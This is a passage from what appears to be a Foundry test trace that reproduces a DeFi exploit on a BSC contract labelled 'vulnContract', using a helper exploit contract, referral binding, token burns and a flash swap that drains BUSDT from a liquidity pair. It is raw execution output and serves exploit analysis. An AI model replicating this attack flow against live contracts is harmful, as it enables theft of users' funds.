    │   │   ├─ [6034] BUSDT::transferFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0xC927A27b6231783AB75eb60eFb0A3b06b97D0Bff, 42500000000000000000 [4.25e19])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xC927A27b6231783AB75eb60eFb0A3b06b97D0Bff, value: 42500000000000000000 [4.25e19])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039415084007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x00e357a739949597d28bb83c9371f1860463866086942c1e9d93858a60c3ac49: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffdb231ab2cb5e5ffff
    │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x00000000000000000000000000000000000000000000001b60579c93f194f800 → 0x000000000000000000000000000000000000000000000019128947c0a77af800
    │   │   │   │   @ 0xd5e8633a913f6e45eb1b22f822b57687728580520e5e904902048c33352755a1: 0x00000000000000000000000000000000000000000000007722f7694d9a8c2c00 → 0x00000000000000000000000000000000000000000000007970c5be20e4a62c00
    │   │   │   └─ ← [Return] true
    │   │   ├─ [27934] BUSDT::transferFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0xe6Cc83568bd7F974bFCF270d1f17A73ea2912FC6, 127500000000000000000 [1.275e20])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xe6Cc83568bd7F974bFCF270d1f17A73ea2912FC6, value: 127500000000000000000 [1.275e20])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], value: 115792089237316195423570985008687907853269984665640564039287584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x000000000000000000000000000000000000000000000019128947c0a77af800 → 0x000000000000000000000000000000000000000000000012291e4946c92cf800
    │   │   │   │   @ 0x00e357a739949597d28bb83c9371f1860463866086942c1e9d93858a60c3ac49: 0xfffffffffffffffffffffffffffffffffffffffffffffffdb231ab2cb5e5ffff → 0xfffffffffffffffffffffffffffffffffffffffffffffff6c8c6acb2d797ffff
    │   │   │   │   @ 0xc7184394fce61ef01f13dd9cd388a6e25fa8ee5ce4048f29f4fbedea63cb8f8f: 0 → 0x000000000000000000000000000000000000000000000006e96afe79de4e0000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [124319] 0x238f5426D18e117158dAf175Ad479c6180e88070::9ca89d1c(00000000000000000000000090bf82c772f16651d6ae51d42c90c84ae703eb420000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f00000000000000000000000000000000000000000000000000000000000017b5)
    │   │   │   ├─ emit Approval(owner: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], approved: 0x0000000000000000000000000000000000000000, tokenId: 6069)
    │   │   │   ├─ emit Transfer(from: BUSDT_MetaWin: [0x90bf82c772f16651d6ae51D42c90c84aE703Eb42], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], tokenId: 6069)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xccf6abcd89ecb2d3fc2071e43cee5f2d756da000222130e8514b84de3feecd3a: 0x00000000000000000000000090bf82c772f16651d6ae51d42c90c84ae703eb42 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 1
    │   │   │   │   @ 0x49c26b9216da887deeba27c29523b84adc43f53dbb9809e0b0cf5ce6c9a2f0bc: 12 → 0
    │   │   │   │   @ 0xc5fc80fd4c099c1b622d30fade61c6f02652ab4fea04a543b9299c9ca25cae75: 7547 → 0
    │   │   │   │   @ 0x631d37b7a370ff06d945ab4d5ed53af05028adaba702084ef99314fadfe23122: 16 → 15
    │   │   │   │   @ 0x4e50448b3aa311118052b10f4ee67d43cad5b8d903fd9802242390017a7af17d: 0 → 6069
    │   │   │   │   @ 0xc5fc80fd4c099c1b622d30fade61c6f02652ab4fea04a543b9299c9ca25cae71: 6069 → 7547
    │   │   │   │   @ 0xab539ed6b4a0eec5b5f8af7d0d4fb18aca0b47c034d6e6c02f608676d78c78c1: 16 → 12
    │   │   │   │   @ 0x9e1c5fcb1e401c1dda80b0157cf14b44b3b67c26c1a77afbd0254b11b5cc8ea3: 0 → 1
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit buyEvent(param0: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param1: 6069)
    │   │   ├─  storage changes:
    │   │   │   @ 0x3a9daae58e87c9bc0cc877bd3105fa41ca9ed5960ab6f5de738888806ec23451: 0x000000000000000000000000e6cc83568bd7f974bfcf270d1f17a73ea2912fc6 → 0
    │   │   │   @ 0x00e357a739949597d28bb83c9371f1860463866086942c1e9d93858a60c3ac49: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffff6c8c6acb2d797ffff
    │   │   │   @ 0xbf53e469409d1022b5821046221774b05d09c0efb76656a311727601f6994d26: 0x00000000000000000000000055d398326f99059ff775485246999027b3197955 → 0
    │   │   │   @ 0xbf53e469409d1022b5821046221774b05d09c0efb76656a311727601f6994d25: 0x0000000000000000000000000000000000000000000000093739534d28680000 → 0
    │   │   │   @ 16: 1 → 0
    │   │   └─ ← [Stop]
    │   ├─ [68771] BindingContract::bindParent(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ emit BingParent(: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 0x996b860ef646da948c7d745162e3851398cba818db7bc8c7a4d9d465a54dfa11: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 1
    │   │   │   @ 0x429395017a52bb1dc38cb8266aa41981a987a1d952e1c19b73cb5d25357bef1e: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   └─ ← [Stop]
    │   ├─ [31119] vulnContract::1f6b08a4(0000000000000000000000000000000000000000000000000000000000000001)
    │   │   ├─ [362] 0xe39cdA8ca56589B0429B580b8f942bE6A936c4da::bbe6c24c() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000024a32a033f08000
    │   │   ├─ [6150] KLEN::burnFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 303030303030303030303 [3.03e20])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039154553704882826609632 [1.157e77])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000000000, value: 303030303030303030303 [3.03e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0x00000000000000000000000000000000000000000000006335dd99d9296e8baf → 0x000000000000000000000000000000000000000000000052c879b2c3fd3e0f90
    │   │   │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075df206edd550d4bd30c3c → 0x00000000000000000000000000000000000000000075df30dc413c227803885b
    │   │   │   │   @ 0xe69eadd5ea6d2b0b1040c3275b937de8f85b904c692c82f2bf962f808e122b15: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffef929c18ead3cf83e0
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─  storage changes:
    │   │   │   @ 0x267d2c637cf11e188a2d31436d704ebcb9a69d58ff6b03f8dfae58aa1345fff5: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [148141] vulnContract::Stack(200000000000000000000 [2e20])
    │   │   ├─ [727] 0x238f5426D18e117158dAf175Ad479c6180e88070::balanceOf(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 1
    │   │   ├─ [362] 0xe39cdA8ca56589B0429B580b8f942bE6A936c4da::bbe6c24c() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000024a32a033f08000
    │   │   ├─ [531] BUSDT::balanceOf(0xff77a0B56E45990cF39C2f9bA6bd630F76C395e3) [staticcall]
    │   │   │   └─ ← [Return] 498146142324551248481742 [4.981e23]
    │   │   ├─ [626] TRUST::balanceOf(0xff77a0B56E45990cF39C2f9bA6bd630F76C395e3) [staticcall]
    │   │   │   └─ ← [Return] 1378983220331919441950 [1.378e21]
    │   │   ├─ [626] TRUST::balanceOf(0x1889a1C801B523EBF9C885F22d6b81F149d222Da) [staticcall]
    │   │   │   └─ ← [Return] 4037621732736356690413 [4.037e21]
    │   │   ├─ [648] MDAO::balanceOf(0x1889a1C801B523EBF9C885F22d6b81F149d222Da) [staticcall]
    │   │   │   └─ ← [Return] 56115775657011601778067785 [5.611e25]
    │   │   ├─ [531] BUSDT::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   │   └─ ← [Return] 512963361056079475662703 [5.129e23]
    │   │   ├─ [626] FCN::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   │   └─ ← [Return] 501971077397338362 [5.019e17]
    │   │   ├─ [6150] KLEN::burnFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 969696969696969696969 [9.696e20])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564038184856735185856912663 [1.157e77])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000000000, value: 969696969696969696969 [9.696e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0x000000000000000000000000000000000000000000000052c879b2c3fd3e0f90 → 0x00000000000000000000000000000000000000000000001e373a02803ca2e8c7
    │   │   │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075df30dc413c227803885b → 0x00000000000000000000000000000000000000000075df656d80ec66389eaf24
    │   │   │   │   @ 0xe69eadd5ea6d2b0b1040c3275b937de8f85b904c692c82f2bf962f808e122b15: 0xffffffffffffffffffffffffffffffffffffffffffffffef929c18ead3cf83e0 → 0xffffffffffffffffffffffffffffffffffffffffffffffbb015c68a713345d17
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [6150] TRUST::burnFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 16609381502749691 [1.66e16])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457567398531626890244 [1.157e77])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000000000, value: 16609381502749691 [1.66e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6faaf9a69445935c0c59ad310361f5121f9e0e3bed8be3a3350da75b3520ef65: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffc4fddb0396f404
    │   │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0x000000000000000000000000000000000000000000000000030a52a8dd593d84 → 0x00000000000000000000000000000000000000000000000002cf5083e0f03189
    │   │   │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x0000000000000000000000000000000000000000000013500a9121af091197ae → 0x0000000000000000000000000000000000000000000013500acc23d4057aa3a9
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [6205] MDAO::burnFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 76946974226034194305 [7.694e19])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039380637033687095445630 [1.157e77])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000000000, value: 76946974226034194305 [7.694e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe69eadd5ea6d2b0b1040c3275b937de8f85b904c692c82f2bf962f808e122b15: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffbd4256e9fbc18087e
    │   │   │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x000000000000000000000000000000000000000002fda90b32aa6458011a5587 → 0x000000000000000000000000000000000000000002fda90f5e84f5b845024d08
    │   │   │   │   @ 0x407b49835a0660cb9d08bcabbbc30a7b3e9142e82d009d6a63d932db9d6b3349: 0x000000000000000000000000000000000000000000000040af4550d1d4901670 → 0x00000000000000000000000000000000000000000000003c836abf7190a81eef
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [6293] FCN::burnFrom(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 31314272511869 [3.131e13])
    │   │   │   ├─ emit Approval(owner: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], value: 115792089237316195423570985008687907853269984665640564039457583976598857128066 [1.157e77])
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x0000000000000000000000000000000000000000, value: 31314272511869 [3.131e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc: 0x000000000000000000000000000000000000000000000000045475f35d30a667 → 0x0000000000000000000000000000000000000000000000000454926e49478de4
    │   │   │   │   @ 0x1cf8c119fd8254f448be2ed6596764f8a9633e4ede81ef5f7ec10f301bee835c: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffe38513e91882
    │   │   │   │   @ 0xacc8d5563f021cfb27a25fbbb0722caca443d5aafeb4d4c3f298f463911d88c7: 0x0000000000000000000000000000000000000000000000000000482973357c41 → 0x00000000000000000000000000000000000000000000000000002bae871e94c4
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [557] BindingContract::getParent(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   ├─ [557] BindingContract::getParent(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000041285a02a7fabc448893f6c1766e4b592f46f96
    │   │   ├─ [557] BindingContract::getParent(addrToBind: [0x041285A02A7fabc448893f6c1766e4B592f46f96]) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000092d922a6dc00ea06ac03a3f52ba7646db50dccdc
    │   │   ├─ [557] BindingContract::getParent(0x92d922A6dc00Ea06ac03a3f52bA7646db50dccdc) [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000cecb91a9a60bb31e0d90f6151a4d0e98f834c4f5
    │   │   ├─ [557] BindingContract::getParent(0xCecB91a9A60bb31e0d90f6151A4d0E98F834c4F5) [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000eb685017d672921e01b4008550e4bef371081b5b
    │   │   ├─ [557] BindingContract::getParent(0xEb685017d672921E01B4008550e4BeF371081b5b) [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000fa3520750ff9ab1d4f21ffe2f414154d3ef61129
    │   │   ├─ [557] BindingContract::getParent(0xfA3520750ff9Ab1d4F21FfE2F414154d3Ef61129) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000025346eff782be12c49451833a2460ba0da294b9c
    │   │   ├─ [557] BindingContract::getParent(0x25346eFF782bE12c49451833a2460ba0dA294b9C) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000013be0c0cb2fa1d3ee90415d00379cc8ed84639eb
    │   │   ├─ [557] BindingContract::getParent(0x13Be0C0cB2FA1D3eE90415d00379Cc8Ed84639eB) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000641720e05728524251ad1afc5808d09bf882717
    │   │   ├─ [557] BindingContract::getParent(0x0641720e05728524251AD1afC5808d09bF882717) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000090d3dc61b72769ea839963be697299f8924e5611
    │   │   ├─  storage changes:
    │   │   │   @ 0xa8a78e67add8e39c02f5f99631cd3c726753083bd258d093d40980bceaf25001: 0x000000000000000000000000000000000000000000000009285ad8b13e33b6dd → 0x00000000000000000000000000000000000000000000000914878a8c05ee0002
    │   │   │   @ 0x53a178f7fed91c34c2962fc06872e11080a49f90a3d587b177ad41e00387a756: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0x4f5a23d656d88845ebf0bb13163beaa0ce63125bfb11a3a405371c97d2011ea5: 0x000000000000000000000000000000000000000000000014ad6280d1b0b5b6dc → 0x00000000000000000000000000000000000000000000001471e8966207e4924a
    │   │   │   @ 0x76422804b3cc1576fccf44a7ae439a391fcffa3ea1105c530189b09c69d61d50: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x000000000000000000000000000000000000000000000000de0b6b3a76400000
    │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000 → 0x00000000000000000000000000000000000000000000000a746e35a0acc36db7
    │   │   │   @ 0xd0a1f927dfb07576fcb6b8c2a7ddaeb66b5b99a3bfd225c354672adba84522da: 0x00000000000000000000000000000000000000000000000959eb1c0e4ae20002 → 0x0000000000000000000000000000000000000000000000094617cde9129c4927
    │   │   │   @ 0x493300507c8cd66cd8857f2e5e9e73d2b7a8486d2a1b88d4713d14b3ea200b31: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0x9534681ec24b2f92b501f154ae52a7b0dfbe604d2df3596f69859e123d55d2f8: 0x0000000000000000000000000000000000000000000000084d48b92f9064924d → 0x00000000000000000000000000000000000000000000000839756b0a581edb72
    │   │   │   @ 0xd93a2d09d8128bab455e84c1455d782ac6050c77be4894eca34d7f8ed7af1d05: 0x00000000000000000000000000000000000000000000000053444835ec580000 → 0x000000000000000000000000000000000000000000000000a688906bd8b00000
    │   │   │   @ 0x926271905aa45412c4040202dcdd587d868e0b1f1f152f51c5a23dabcb876c76: 0x00000000000000000000000000000000000000000000000977a811461f4a924c → 0x00000000000000000000000000000000000000000000000963d4c320e704db71
    │   │   │   @ 0x6c6dcd4296f397ef776a916efcc608d1ef1a223f753cc1d015c09f625fede8d1: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0x17ef568e3e12ab5b9c7254a8d58478811de00f9e6eb34345acd53bf8fd09d3ec: 0x0000000000000000000000000000000000000000000013500a9121af091197ae → 0x000000000000000000000000000000000000000002fda90f5e84f5b845024d08
    │   │   │   @ 0xefd419ecbc1a23cbe605d77bd9c53b33df55090ed39c8f9d816ea273de7fe533: 0x000000000000000000000000000000000000000000000011808afcdbad8b6db8 → 0x0000000000000000000000000000000000000000000000116cb7aeb67545b6dd
    │   │   │   @ 0x62fb572b27d45301661a54684af060926f9d3887853f62b663346f1e5834f793: 0x00000000000000000000000000000000000000000000000053444835ec580000 → 0x0000000000000000000000000000000000000000000000006f05b59d3b200000
    │   │   │   @ 0x576f67f4b6785e4f2ea773f67178f466469ee7912fe98c865f5544cc79deccb6: 0x00000000000000000000000000000000000000000000000963d4c320e704db71 → 0x000000000000000000000000000000000000000000000009500174fbaebf2496
    │   │   │   @ 0x6264d4050170ce4ae5c84c6b1917bf824c321f6bda5a3c7d3f4ede193c11ad60: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0xc43a18728dee70c1cf76a513eef739350a6e2b673f21a950d1ef74884d13ae6e: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   @ 0x8741faef3f1e8ca4fb40c79b0ffa2afe1fb84c8321f507b6c916d77a0be36175: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4074: 0 → 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000
    │   │   │   @ 0x9a2ada2733561e1c19dd04d270d8000fe18633772bc90828f20e06927d4fb838: 0 → 0x00000000000000000000000000000000000000000000000000000000657d87cc
    │   │   │   @ 13: 0x000000000000000000000000000000000000000000000ff1b35d5341fa6e6fce → 0x000000000000000000000000000000000000000000000ffb261090fecba79464
    │   │   │   @ 0x3617319a054d772f909f7c479a2cebe5066e836a939412e32403c99029b92eff: 0x00000000000000000000000000000000000000000075df30dc413c227803885b → 0x00000000000000000000000000000000000000000075df656d80ec66389eaf24
    │   │   │   @ 0x05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc: 0x000000000000000000000000000000000000000000000000045475f35d30a667 → 0x0000000000000000000000000000000000000000000000000454926e49478de4
    │   │   │   @ 0xf40c6a48f999abaf4dead46e53c33df57b1acd2945f7b1dc11614b812207eceb: 0x0000000000000000000000000000000000000000000000096dbe6a338327b6de → 0x00000000000000000000000000000000000000000000000959eb1c0e4ae20003
    │   │   │   @ 0x9c11463ac32a10c8e5581ed06ce9369ade4d142283a6feefba561c814ffe5362: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0x0000000000000000000000000000000000000000000000003782dace9d900000
    │   │   │   @ 0xc90be21bd2ed10ec8c7dd90917e20b9bea1d19e279416e761d10da6f626e3b51: 0x0000000000000000000000000000000000000000000000154bfcf1fb72e36db7 → 0x0000000000000000000000000000000000000000000000151083078bca124925
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [0] VM::roll(33972130 [3.397e7])
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   └─ ← [Return] 512963361056079475662703 [5.129e23]
    ├─ [102144] FCN_BUSDT::swap(0, 512963341056079475662703 [5.129e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [6071] BUSDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 512963341056079475662703 [5.129e23])
    │   │   ├─ emit Transfer(from: FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 512963341056079475662703 [5.129e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5b26c5686994aee13b4162e3dddd8f0510503237ac01a08053064ad499a773fa: 0x000000000000000000000000000000000000000000006c9fccad8c234e505f6f → 0x00000000000000000000000000000000000000000000000000470de4df820000
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000001b60579c93f194f800 → 0x000000000000000000000000000000000000000000006cbb2cbe1ad26063576f
    │   │   └─ ← [Return] true
    │   ├─ [59039] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 512963341056079475662703 [5.129e23], 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   │   ├─ [36694] vulnContract::d9574d4c()
    │   │   │   ├─ [531] BUSDT::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   │   │   └─ ← [Return] 20000000000000000 [2e16]
    │   │   │   ├─ [626] FCN::balanceOf(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10]) [staticcall]
    │   │   │   │   └─ ← [Return] 501971077397338362 [5.019e17]
    │   │   │   ├─ [13812] FCN::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 225886984828802268274 [2.258e20])
    │   │   │   │   ├─ emit Transfer(from: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 225886984828802268274 [2.258e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb4bc3b7499c6d2eed0c87c2ca7f2eee25178462ca0a01346aeaae68f9b5fa89f: 0x00000000000000000000000000000000000000000000000db6ef6dae57c38ac5 → 0x000000000000000000000000000000000000000000000001781fa5c79ef40e53
    │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000000482973357c42 → 0x00000000000000000000000000000000000000000000000c3ed010102c04f8b4
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [13812] FCN::transfer(0x19C4a6b4AbFe88161F07C4fA2229a4120ACFd7d5, 25098553869866918697 [2.509e19])
    │   │   │   │   ├─ emit Transfer(from: vulnContract: [0x431Abb27dAB05f4E7cDeAA18390fE39364197500], to: 0x19C4a6b4AbFe88161F07C4fA2229a4120ACFd7d5, value: 25098553869866918697 [2.509e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb4bc3b7499c6d2eed0c87c2ca7f2eee25178462ca0a01346aeaae68f9b5fa89f: 0x000000000000000000000000000000000000000000000001781fa5c79ef40e53 → 0x0000000000000000000000000000000000000000000000001bcfac035187ab2a
    │   │   │   │   │   @ 0x6b1fd9b063fc8c0e53f9146635fbb472434ce13e1642ddc2b5620d240482e90f: 0x0000000000000000000000000000000000000000000000000003b69635680b5a → 0x0000000000000000000000000000000000000000000000015c53b05a82d46e83
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc43a18728dee70c1cf76a513eef739350a6e2b673f21a950d1ef74884d13ae6e: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] BUSDT::transfer(FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], 10000000000000000000000 [1e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: FCN_BUSDT: [0xACB496dd4A8b6B9D1B99D422b8700F6EF932Bc10], value: 10000000000000000000000 [1e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5b26c5686994aee13b4162e3dddd8f0510503237ac01a08053064ad499a773fa: 0x00000000000000000000000000000000000000000000000000470de4df820000 → 0x00000000000000000000000000000000000000000000021e1a27d79f91c20000
